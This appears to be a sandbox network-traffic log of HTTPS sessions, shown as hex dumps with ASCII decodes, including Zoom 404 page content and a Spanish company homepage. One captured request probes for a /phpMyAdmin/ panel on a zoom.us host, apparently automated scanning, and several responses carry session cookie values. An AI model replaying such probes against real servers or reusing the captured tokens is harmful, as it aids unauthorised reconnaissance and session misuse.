                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC5568INData Raw: 5f 6c 6f 67 69 6e 5f 70 61 67 65 22 2c 22 77 73 22 3a 22 77 73 73 3a 2f 2f 62 2d 69 61 6d 2d 77 65 62 73 6f 63 6b 65 74 2d 61 70 69 2e 73 65 72 76 69 63 65 22 2c 22 70 61 72 74 6e 65 72 5f 66 6f 72 75 6d 22 3a 22 68 74 74 70 73 3a 2f 2f 70 61 72 74 6e 65 72 2e 62 6f 6f 6b 69 6e 67 2e 63 6f 6d 2f 65 6e 2d 75 73 2f 6e 6f 64 65 2f 32 37 2f 3f 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 32 37 26 75 74 6d 5f 73 6f 75 72 63 65 3d 65 78 74 72 61 6e 65 74 5f 6c 6f 67 69 6e 5f 70 61 67 65 22 7d 2c 22 70 65 72 73 6f 6e 61 6c 69 73 61 74 69 6f 6e 5f 64 69 73 70 6c 61 79 65 64 22 3a 30 2c 22 73 74 61 74 69 63 5f 68 6f 73 74 6e 61 6d 65 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 63 66 2e 62 73 74 61 74 69 63 2e 63 6f 6d 22 5d 2c 22 74 72 61 63 6b 69 6e 67 5f 70 61 72 61 6d 73 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: _login_page","ws":"wss://b-iam-websocket-api.service","partner_forum":"https://partner.booking.com/en-us/node/27/?utm_content=27&utm_source=extranet_login_page"},"personalisation_displayed":0,"static_hostnames":["https://cf.bstatic.com"],"tracking_params"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                115192.168.2.663163170.114.52.2443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC337OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=9aWbkbPT4DdlgG_jg44HMc41AE1.59S3JcFtxwJ.xgU-1707131766-1-AerVx9RXy0Zm7OnurxzYuId07SlHkitQXtOcQmpWK47Y6f+CHIBXVtzdIORdzJ1w/NBTDnTUsLHOaZpdNAQ/zfs=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=aw1;rid=WEB_6455cff9bec81e85c104a918f9ef0987
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-BCeN5OvgRbWKWthsB8G9pg' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1302INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 73 73 69 64 3d 61 77 31 5f 63 5f 6e 72 69 74 43 62 62 54 51 76 79 5a 75 4b 79 62 71 76 39 68 45 51 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 63 72 65 64 3d 41 43 43 43 34 33 42 46 42 30 45 36 43 45 34 36 44 44 36 36 33 36 45 38 31 33 44 45 38 38 30 42 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 63 74 61 69 64 3d 55 5a 35 42 4c 49 51 50 53 46 57 6d 4f 4b 65 52 79 54 46 47 31 77 2e 31 37 30 37 31 33 31 37 36 38 32 36 34 2e 62 30 34 64 38 34 30 61 39 39 63 64 32 34 34 66 66 65 37 61 36 66 62 31 34 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_ssid=aw1_c_nritCbbTQvyZuKybqv9hEQ; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: cred=ACCC43BFB0E6CE46DD6636E813DE880B; Path=/; Secure; HttpOnlyset-cookie: _zm_ctaid=UZ5BLIQPSFWmOKeRyTFG1w.1707131768264.b04d840a99cd244ffe7a6fb140
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC620INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 76 69 73 69 74 6f 72 5f 67 75 69 64 3d 66 33 32 38 64 35 63 38 35 31 61 36 34 65 66 36 39 62 38 64 61 33 61 66 65 62 38 65 62 61 38 38 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 30 34 20 46 65 62 20 32 30 32 35 20 31 31 3a 31 36 3a 30 38 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 0d 0a 78 2d 7a 6d 2d 7a 6f 6e 65 69 64 3a 20 56 41 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 53 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: _zm_visitor_guid=f328d5c851a64ef69b8da3afeb8eba88; Max-Age=31536000; Expires=Tue, 04 Feb 2025 11:16:08 GMT; Domain=zoom.us; Path=/; Securex-zm-zoneid: VAcontent-language: en-USCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"ht
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 37 66 66 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 2f 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 23 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 5a 6f 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ff9<!doctype html><html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US"><head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"><title>Page Not Found - Zoom</title><meta http-equiv="X-UA-Compati
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 2c 20 76 69 64 65 6f 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 6f 6e 6c 69 6e 65 20 6d 65 65 74 69 6e 67 73 2c 20 77 65 62 20 6d 65 65 74 69 6e 67 2c 20 76 69 64 65 6f 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 76 69 64 65 6f 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 61 6c 6c 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 68 61 74 2c 20 73 63 72 65 65 6e 20 73 68 61 72 65 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 73 68 61 72 65 2c 20 6d 6f 62 69 6c 69 74 79 2c 20 6d 6f 62 69 6c 65 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 64 65 73 6b 74 6f 70 20 73 68 61 72 65 2c 20 76 69 64 65 6f 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 67 72 6f 75 70 20 6d 65 73 73 61 67 69 6e 67 22 20 2f 3e 0a 3c 6d 65 74 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: , video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging" /><meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 74 69 6f 6e 20 75 73 65 64 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 69 6e 20 62 6f 61 72 64 2c 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 68 75 64 64 6c 65 2c 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 72 6f 6f 6d 73 2c 20 61 73 20 77 65 6c 6c 20 61 73 20 65 78 65 63 75 74 69 76 65 20 6f 66 66 69 63 65 73 20 61 6e 64 20 63 6c 61 73 73 72 6f 6f 6d 73 2e 20 46 6f 75 6e 64 65 64 20 69 6e 20 32 30 31 31 2c 20 5a 6f 6f 6d 20 68 65 6c 70 73 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 62 72 69 6e 67 20 74 68 65 69 72 20 74 65 61 6d 73 20 74 6f 67 65 74 68 65 72 20 69 6e 20 61 20 66 72 69 63 74 69 6f 6e 6c 65 73 73 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 74 6f 20 67 65 74 20 6d 6f 72 65 20 64 6f 6e 65 2e 20 5a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tion used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done. Z
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 73 74 5f 63 6f 6f 6b 69 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 20 63 6c 61 73 73 3d 22 6f 70 74 61 6e 6f 6e 2d 63 61 74 65 67 6f 72 79 2d 43 30 30 30 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 43 65 4e 35 4f 76 67 52 62 57 4b 57 74 68 73 42 38 47 39 70 67 22 3e 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 49 64 20 3d 20 22 66 33 32 38 64 35 63 38 35 31 61 36 34 65 66 36 39 62 38 64 61 33 61 66 65 62 38 65 62 61 38 38 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 4b 65 79 20 3d 20 22 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 5b 27 6f 70 74 69 6d 69 7a 65 6c 79 27 5d 20 3d 20 77 69 6e 64 6f 77 5b 27 6f 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: st_cookie.min.js" type="text/plain" class="optanon-category-C0004"></script><script nonce="BCeN5OvgRbWKWthsB8G9pg">window.zmGlobalMrktId = "f328d5c851a64ef69b8da3afeb8eba88" || null;window.zmGlobalMrktKey = "" || null;window['optimizely'] = window['op
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 69 63 6f 6e 2d 65 72 72 6f 72 20 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 37 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 45 38 31 37 33 44 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 63 6c 6f 73 65 20 7b 0a 63 6f 6c 6f 72 3a 20 23 31 33 31 36 31 39 3b 0a 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 43 65 4e 35 4f 76 67 52 62 57 4b 57 74 68 73 42 38 47 39 70 67 22 20 73 72 63 3d 22 2f 63 73 72 66 5f 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 42 43 65 4e 35 4f 76 67 52 62 57 4b 57 74 68 73 42 38 47 39 70 67 22 3e 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: icon-error {font-size: 17px;color: #E8173D;}.expired-cc-banner .zm-icon-close {color: #131619;cursor: pointer;}</style><script nonce="BCeN5OvgRbWKWthsB8G9pg" src="/csrf_js"></script><script nonce="BCeN5OvgRbWKWthsB8G9pg">window.dataLayer = wind
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 72 65 66 27 29 3b 0a 69 66 28 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 29 20 7b 0a 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 2e 74 65 78 74 20 3d 20 24 2e 69 31 38 6e 2e 67 65 74 28 22 6d 61 72 6b 65 74 69 6e 67 2e 70 72 69 76 61 63 79 2e 6f 6e 65 74 72 75 73 74 2e 63 6f 6f 6b 69 65 5f 70 72 65 66 22 29 3b 0a 7d 0a 76 61 72 20 6f 6e 65 54 72 75 73 74 43 6f 6e 73 65 6e 74 49 64 20 3d 20 4f 6e 65 54 72 75 73 74 2e 67 65 74 44 61 74 61 53 75 62 6a 65 63 74 49 64 28 29 3b 0a 76 61 72 20 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 28 4f 6e 65 74 72 75 73 74 41 63 74 69 76 65 47 72 6f 75 70 73 20 7c 7c 20 27 27 29 2e 73 70 6c 69 74 28 27 2c 27 29 3b 0a 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 61 63 74 69 76 65 47 72 6f 75 70 73 2e 66 69 6c 74 65 72 28 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ref');if(cookiePrefDOM) {cookiePrefDOM.text = $.i18n.get("marketing.privacy.onetrust.cookie_pref");}var oneTrustConsentId = OneTrust.getDataSubjectId();var activeGroups = (OnetrustActiveGroups || '').split(',');activeGroups = activeGroups.filter(fun
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 3b 0a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 32 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 6c 65 66 74 3a 20 36 70 78 3b 0a 74 6f 70 3a 20 35 30 25 3b 0a 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 0a 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 62 61 63 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: order-left: 1px solid;margin-left: 10px;}#ot-do-not-sell {position: relative;padding-left: 42px !important;}#ot-do-not-sell::before {content: "";position: absolute;left: 6px;top: 50%;transform: translateY(-50%);width: 30px;height: 15px;back
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 74 72 6f 6c 73 3d 22 73 65 61 72 63 68 42 6f 78 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 42 75 74 74 6f 6e 49 63 6f 6e 22 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 30 20 30 20 32 30 20 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 72 6f 6c 65 3d 22 69 6d 67 22 3e 0a 3c 67 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3e 0a 3c 70 61 74 68 20 64 3d 22 6d 38 2e 33 36 38 20 31 36 2e 37 33 36 63 2d 34 2e 36 31 34 20 30 2d 38 2e 33 36 38 2d 33 2e 37 35 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: trols="searchBox" tabindex="0"><span class="searchButtonIcon"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" role="img"><g fill="currentColor"><path d="m8.368 16.736c-4.614 0-8.368-3.754


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                116192.168.2.663175104.21.5.25443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC159OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC755INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B3WePQwWwRsVmE8AfE7wJhqXRN%2Bxd9RMteo6Nj4oUWGQurwLWtThlDYIWvyuaiANFZMMpQz8a1zjdvp5%2B%2FNYe3BU1K2jaSMcn8UfA6AGuxORbKfBWhDdtcrWEdE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd50ac4e7b91-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC614INData Raw: 32 38 63 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 0a 3c 74 69 74 6c 65 3e 3a 2e 20 54 65 72 6e 61 4e 65 74 20 2e 3a 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 2f 62 6f 6f 74 73 74 72 61 70 74 61 73 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 28c1<!DOCTYPE html><html lang="es"><head><meta charset="utf-8"><title>:. TernaNet .:</title><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="description" content /><meta name="author" content="//bootstraptaste
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 68 74 6d 6c 35 73 68 69 6d 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 73 37 2e 61 64 64 74 68 69 73 2e 63 6f 6d 2f 6a 73 2f 33 30 30 2f 61 64 64 74 68 69 73 5f 77 69 64 67 65 74 2e 6a 73 23 70 75 62 69 64 3d 72 61 2d 35 34 35 62 39 63 66 35 32 37 31 38 61 34 33 63 22 20 61 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 77 69 6e 64 6f 77 2e 66 62 41 73 79 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--></head><body><script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-545b9cf52718a43c" async></script><script> window.fbAsyn
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 6f 70 64 6f 77 6e 22 20 64 61 74 61 2d 64 65 6c 61 79 3d 22 30 22 20 64 61 74 61 2d 63 6c 6f 73 65 2d 6f 74 68 65 72 73 3d 22 66 61 6c 73 65 22 3e 50 72 6f 64 75 63 74 6f 73 20 3c 62 20 63 6c 61 73 73 3d 22 20 69 63 6f 6e 2d 61 6e 67 6c 65 2d 64 6f 77 6e 22 3e 3c 2f 62 3e 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 76 69 73 69 6f 6e 2e 68 74 6d 6c 22 3e 56 69 73 69 c3 b3 6e 20 47 65 6e 65 72 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 74 65 72 6e 61 6e 65 74 2e 68 74 6d 6c 22 3e 54 65 72 6e 61 4e 65 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 74 65 72 6e 61 73 63 68 6f 6f 6c 2e 68 74 6d 6c 22 3e 54 65 72 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: opdown" data-delay="0" data-close-others="false">Productos <b class=" icon-angle-down"></b></a><ul class="dropdown-menu"><li><a href="vision.html">Visin General</a></li><li><a href="ternanet.html">TernaNet</a></li><li><a href="ternaschool.html">Tern
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 63 69 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 6f 70 72 6f 6d 6f 22 3e 43 6f 6e 74 61 63 74 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 66 65 61 74 75 72 65 64 22 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 32 22 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 73 6c 69 64 65 72 22 20 63 6c 61 73 73 3d 22 66 6c 65 78 73 6c 69 64 65 72 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 73 6c 69 64 65 73 22 3e 0a 3c 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cios</a></li><li><a href="contactopromo">Contacto</a></li></ul></div></div></div></header><section id="featured"><div class="container"><div class="row"><div class="col-lg-12"><div id="main-slider" class="flexslider"><ul class="slides"><l
